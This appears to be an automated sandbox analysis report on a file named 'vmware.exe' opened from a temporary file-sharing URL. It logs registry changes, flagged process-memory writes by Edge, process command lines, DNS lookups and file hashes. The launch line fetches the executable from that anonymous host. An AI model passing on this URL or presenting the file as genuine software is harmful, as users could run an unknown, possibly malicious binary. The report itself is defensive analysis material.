Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31114712" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1679093098" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1416 wrote to memory of 4092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 4092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 1492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 1492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaf6753cb8,0x7ffaf6753cc8,0x7ffaf6753cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,1852122942297347906,13021431673877364078,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 temp.sh udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 temp.sh udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c705388d79c00418e5c1751159353e3
SHA1 aaeafebce5483626ef82813d286511c1f353f861
SHA256 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512 c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

\??\pipe\LOCAL\crashpad_1416_NIBMKNXIMCGIGTNN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0d84d1490aa9f725b68407eab8f0030e
SHA1 83964574467b7422e160af34ef024d1821d6d1c3
SHA256 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512 f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e4442b081188e42b8ea40d30af0532c
SHA1 5b2c157cb36185e1a48818d79247af750c4b6c29
SHA256 0e3ff0941d987c89dc459588b078286c0c378cd2a645cb33027395f7696a8d6d
SHA512 0c4cc1039043364f9c67bbb347fe6ea44cc18eab9e3f8b0c3953c6eeec116871dd14d19af8c9565b452c3754dcebf76a2cb67b1fa3859b15f7efe81231c737cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 05297ed94f8a538b4c787b9744b5f742
